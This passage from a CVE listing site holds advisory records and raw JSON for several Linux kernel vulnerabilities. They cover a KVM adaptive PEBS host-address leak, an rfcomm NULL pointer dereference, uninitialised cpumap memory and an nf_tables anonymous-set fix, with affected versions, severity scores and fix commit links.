              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/pmu: Disable support for adaptive PEBS\n\nDrop support for virtualizing adaptive PEBS, as KVM\u0027s implementation is\narchitecturally broken without an obvious/easy path forward, and because\nexposing adaptive PEBS can leak host LBRs to the guest, i.e. can leak\nhost kernel addresses to the guest.\n\nBug #1 is that KVM doesn\u0027t account for the upper 32 bits of\nIA32_FIXED_CTR_CTRL when (re)programming fixed counters, e.g\nfixed_ctrl_field() drops the upper bits, reprogram_fixed_counters()\nstores local variables as u8s and truncates the upper bits too, etc.\n\nBug #2 is that, because KVM _always_ sets precise_ip to a non-zero value\nfor PEBS events, perf will _always_ generate an adaptive record, even if\nthe guest requested a basic record.  Note, KVM will also enable adaptive\nPEBS in individual *counter*, even if adaptive PEBS isn\u0027t exposed to the\nguest, but this is benign as MSR_PEBS_DATA_CFG is guaranteed to be zero,\ni.e. the guest will only ever see Basic records.\n\nBug #3 is in perf.  intel_pmu_disable_fixed() doesn\u0027t clear the upper\nbits either, i.e. leaves ICL_FIXED_0_ADAPTIVE set, and\nintel_pmu_enable_fixed() effectively doesn\u0027t clear ICL_FIXED_0_ADAPTIVE\neither.  I.e. perf _always_ enables ADAPTIVE counters, regardless of what\nKVM requests.\n\nBug #4 is that adaptive PEBS *might* effectively bypass event filters set\nby the host, as \"Updated Memory Access Info Group\" records information\nthat might be disallowed by userspace via KVM_SET_PMU_EVENT_FILTER.\n\nBug #5 is that KVM doesn\u0027t ensure LBR MSRs hold guest values (or at least\nzeros) when entering a vCPU with adaptive PEBS, which allows the guest\nto read host LBRs, i.e. host RIPs/addresses, by enabling \"LBR Entries\"\nrecords.\n\nDisable adaptive PEBS support as an immediate fix due to the severity of\nthe LBR leak in particular, and because fixing all of the bugs will be\nnon-trivial, e.g. not suitable for backporting to stable kernels.\n\nNote!  This will break live migration, but trying to make KVM play nice\nwith live migration would be quite complicated, wouldn\u0027t be guaranteed to\nwork (i.e. KVM might still kill/confuse the guest), and it\u0027s not clear\nthat there are any publicly available VMMs that support adaptive PEBS,\nlet alone live migrate VMs that support adaptive PEBS, e.g. QEMU doesn\u0027t\nsupport PEBS in any capacity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:40.663Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0fb74c00d140a66128afc0003785dcc57e69d312"
        },
        {
          "url": "https://git.kernel.org/stable/c/037e48ceccf163899374b601afb6ae8d0bf1d2ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a7650b3ac23e5fc8c990f00e94f787dc84e3175"
        },
        {
          "url": "https://git.kernel.org/stable/c/9e985cbf2942a1bb8fcef9adc2a17d90fd7ca8ee"
        }
      ],
      "title": "KVM: x86/pmu: Disable support for adaptive PEBS",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26992",
    "datePublished": "2024-05-01T05:27:57.967Z",
    "dateReserved": "2024-02-19T14:20:24.205Z",
    "dateUpdated": "2025-11-04T17:15:44.124Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-22099 (GCVE-0-2024-22099)

Vulnerability from cvelistv5 – Published: 2024-01-25 07:02 – Updated: 2025-06-05 19:44

Title

NULL pointer deference in rfcomm_check_security in Linux kernel

Summary

NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2.

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Anolis

References

URL

Tags

	https://bugzilla.openanolis.cn/show_bug.cgi?id=7956
	https://lists.fedoraproject.org/archives/list/pac…
	https://lists.fedoraproject.org/archives/list/pac…
	https://lists.debian.org/debian-lts-announce/2024…
	https://lists.debian.org/debian-lts-announce/2024…

Impacted products

	Vendor	Product	Version
	Linux	Linux kernel	Affected: v2.6.12-rc2 , < v6.8-rc1 (custom)

Credits

Yuxuan-Hu <20373622@buaa.edu.cn>

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T22:35:34.715Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7956"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-22099",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-01-29T19:53:29.673847Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-06-05T19:44:19.805Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://mirrors.openanolis.cn/anolis/",
          "defaultStatus": "unaffected",
          "modules": [
            "net",
            "bluetooth"
          ],
          "packageName": "kernel",
          "platforms": [
            "Linux",
            "x86",
            "ARM"
          ],
          "product": "Linux kernel",
          "programFiles": [
            "https://gitee.com/anolis/cloud-kernel/blob/release-5.10/net/bluetooth/rfcomm/core.c"
          ],
          "repo": "https://gitee.com/anolis/cloud-kernel.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "v6.8-rc1",
              "status": "affected",
              "version": "v2.6.12-rc2",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Yuxuan-Hu \u003c20373622@buaa.edu.cn\u003e"
        }
      ],
      "datePublic": "2024-01-19T03:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers.\u003cp\u003e This vulnerability is associated with program files \u003ctt\u003e/net/bluetooth/rfcomm/core.C\u003c/tt\u003e.\u003c/p\u003e\u003cp\u003eThis issue affects Linux kernel: v2.6.12-rc2.\u003c/p\u003e"
            }
          ],
          "value": "NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.\n\nThis issue affects Linux kernel: v2.6.12-rc2."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-100",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-100 Overflow Buffers"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-27T12:08:47.749Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7956"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe\"\u003ehttps://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe\u003c/a\u003e\u003cbr\u003e"
            }
          ],
          "value": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/"
        }
      ],
      "source": {
        "advisory": "Not yet",
        "discovery": "INTERNAL"
      },
      "title": "NULL pointer deference in rfcomm_check_security in Linux kernel",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2024-22099",
    "datePublished": "2024-01-25T07:02:59.928Z",
    "dateReserved": "2024-01-15T09:44:45.533Z",
    "dateUpdated": "2025-06-05T19:44:19.805Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27431 (GCVE-0-2024-27431)

Vulnerability from cvelistv5 – Published: 2024-05-17 12:02 – Updated: 2025-05-04 09:04

Title

cpumap: Zero-initialise xdp_rxq_info struct before running XDP program

Summary

In the Linux kernel, the following vulnerability has been resolved: cpumap: Zero-initialise xdp_rxq_info struct before running XDP program When running an XDP program that is attached to a cpumap entry, we don't initialise the xdp_rxq_info data structure being used in the xdp_buff that backs the XDP program invocation. Tobias noticed that this leads to random values being returned as the xdp_md->rx_queue_index value for XDP programs running in a cpumap. This means we're basically returning the contents of the uninitialised memory, which is bad. Fix this by zero-initialising the rxq data structure before running the XDP program.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-908 - Use of Uninitialized Resource

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5f4e51abfbe6eb444…
	https://git.kernel.org/stable/c/f0363af9619c77730…
	https://git.kernel.org/stable/c/3420b3ff1ff489c17…
	https://git.kernel.org/stable/c/f562e4c4aab00986d…
	https://git.kernel.org/stable/c/eaa7cb836659ced2d…
	https://git.kernel.org/stable/c/2487007aa3b9fafbd…

Impacted products

Vendor

Product

Version

Linux

Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < 5f4e51abfbe6eb444fa91906a5cd083044278297 (git)
Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < f0363af9619c77730764f10360e36c6445c12f7b (git)
Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < 3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95 (git)
Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < f562e4c4aab00986dde3093c4be919c3f2b85a4a (git)
Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < eaa7cb836659ced2d9f814ac32aa3ec193803ed6 (git)
Affected: 9216477449f33cdbc9c9a99d49f500b7fbb81702 , < 2487007aa3b9fafbd2cb14068f49791ce1d7ede5 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.213 , ≤ 5.10.* (semver)
Unaffected: 5.15.152 , ≤ 5.15.* (semver)
Unaffected: 6.1.82 , ≤ 6.1.* (semver)
Unaffected: 6.6.22 , ≤ 6.6.* (semver)
Unaffected: 6.7.10 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "9216477449f3"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "5.9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "0"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.10.213"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.15.152"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.1.82"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.6.22"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.7.10"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.8"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-27431",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-17T16:29:06.840486Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-908",
                "description": "CWE-908 Use of Uninitialized Resource",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-23T21:49:35.963Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.315Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f4e51abfbe6eb444fa91906a5cd083044278297"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f0363af9619c77730764f10360e36c6445c12f7b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f562e4c4aab00986dde3093c4be919c3f2b85a4a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eaa7cb836659ced2d9f814ac32aa3ec193803ed6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2487007aa3b9fafbd2cb14068f49791ce1d7ede5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/cpumap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5f4e51abfbe6eb444fa91906a5cd083044278297",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            },
            {
              "lessThan": "f0363af9619c77730764f10360e36c6445c12f7b",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            },
            {
              "lessThan": "3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            },
            {
              "lessThan": "f562e4c4aab00986dde3093c4be919c3f2b85a4a",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            },
            {
              "lessThan": "eaa7cb836659ced2d9f814ac32aa3ec193803ed6",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            },
            {
              "lessThan": "2487007aa3b9fafbd2cb14068f49791ce1d7ede5",
              "status": "affected",
              "version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/cpumap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.213",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.152",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.82",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.22",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.213",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.152",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.82",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.22",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.10",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpumap: Zero-initialise xdp_rxq_info struct before running XDP program\n\nWhen running an XDP program that is attached to a cpumap entry, we don\u0027t\ninitialise the xdp_rxq_info data structure being used in the xdp_buff\nthat backs the XDP program invocation. Tobias noticed that this leads to\nrandom values being returned as the xdp_md-\u003erx_queue_index value for XDP\nprograms running in a cpumap.\n\nThis means we\u0027re basically returning the contents of the uninitialised\nmemory, which is bad. Fix this by zero-initialising the rxq data\nstructure before running the XDP program."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:04:51.900Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5f4e51abfbe6eb444fa91906a5cd083044278297"
        },
        {
          "url": "https://git.kernel.org/stable/c/f0363af9619c77730764f10360e36c6445c12f7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95"
        },
        {
          "url": "https://git.kernel.org/stable/c/f562e4c4aab00986dde3093c4be919c3f2b85a4a"
        },
        {
          "url": "https://git.kernel.org/stable/c/eaa7cb836659ced2d9f814ac32aa3ec193803ed6"
        },
        {
          "url": "https://git.kernel.org/stable/c/2487007aa3b9fafbd2cb14068f49791ce1d7ede5"
        }
      ],
      "title": "cpumap: Zero-initialise xdp_rxq_info struct before running XDP program",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27431",
    "datePublished": "2024-05-17T12:02:10.274Z",
    "dateReserved": "2024-02-25T13:47:42.686Z",
    "dateUpdated": "2025-05-04T09:04:51.900Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26642 (GCVE-0-2024-26642)

Vulnerability from cvelistv5 – Published: 2024-03-21 10:43 – Updated: 2025-05-04 08:52

Title

netfilter: nf_tables: disallow anonymous set with timeout flag

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: disallow anonymous set with timeout flag Anonymous sets are never used with timeout from userspace, reject this. Exception to this rule is NFT_SET_EVAL to ensure legacy meters still work.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e4988d8415bd0294d…
	https://git.kernel.org/stable/c/e9a0d3f376eb356d5…
	https://git.kernel.org/stable/c/fe40ffbca19dc70d7…
	https://git.kernel.org/stable/c/7cdc1be24cc1bcd56…
	https://git.kernel.org/stable/c/72c1efe3f247a5816…
	https://git.kernel.org/stable/c/c0c2176d1814b92ea…
	https://git.kernel.org/stable/c/8e07c16695583a66e…
	https://git.kernel.org/stable/c/16603605b667b70da…

Impacted products

Vendor

Product

Version

Linux

Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 72c1efe3f247a581667b7d368fff3bd9a03cd57a (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 8e07c16695583a66e81f67ce4c46e94dece47ba7 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 16603605b667b70da974bea8216c93e7db043bf1 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26642",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T17:43:46.916001Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:25.164Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.677Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199"
          },
          {
            "tags": [
              "x_transferred"
